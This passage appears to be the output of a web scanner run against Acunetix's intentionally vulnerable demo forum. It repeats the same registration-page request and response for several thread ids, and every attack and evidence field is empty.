<td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=62 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=63 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=64 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=65 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=66 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=67 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=68 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=69 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> 